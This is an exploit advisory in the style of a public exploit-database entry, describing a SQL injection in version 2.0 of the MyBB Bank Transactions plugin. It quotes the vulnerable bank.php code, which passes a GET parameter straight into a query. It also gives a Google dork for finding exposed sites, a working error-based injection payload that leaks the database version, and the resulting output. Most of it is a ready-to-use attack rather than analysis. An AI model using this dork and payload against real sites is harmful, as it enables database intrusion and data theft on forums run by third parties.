# Exploit Title: MyBB Bank Transactions Plugin SQL Injection # Google Dork: inurl:bank.php?transactions= # Date: 13.12.2012 # Exploit Author: limb0 # Vendor Homepage: http://mods.mybb.com/view/transactions # Software Link: www.kingofpersia.ir # Version: 2.0 # Category:Web Security # Tested on: Linux ================================SQLi============================== Installation: 1:Download the plugin and copy-paste the files on the right directory 2:Activate the plugin (On this step maybe you will get an error like: SQL Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM DEFAULT CHARSET=utf8' at line 7 This is because of the plugin.Open the bank.php from the /inc/plugins directory and delete this part from every query: "TYPE=MyISAM DEFAULT CHARSET=utf8".When you click on Activate again everything should work right) ------------------------------------------------------------------ This vulnerability exists on bank.php Vulnerable lines $uid=$_GET['transactions']; $T_ID=1; $T_ufetch=$db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE uid=$uid "); ------------------------------------------------------------------- Instructions: Go to: /bank.php?transactions=[SQLi] example: /bank.php?transactions=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1-- Result: 1062 - Duplicate entry '5.5.27~1' for key 'group_key' Proof:http://postimage.org/image/i34m16ejj/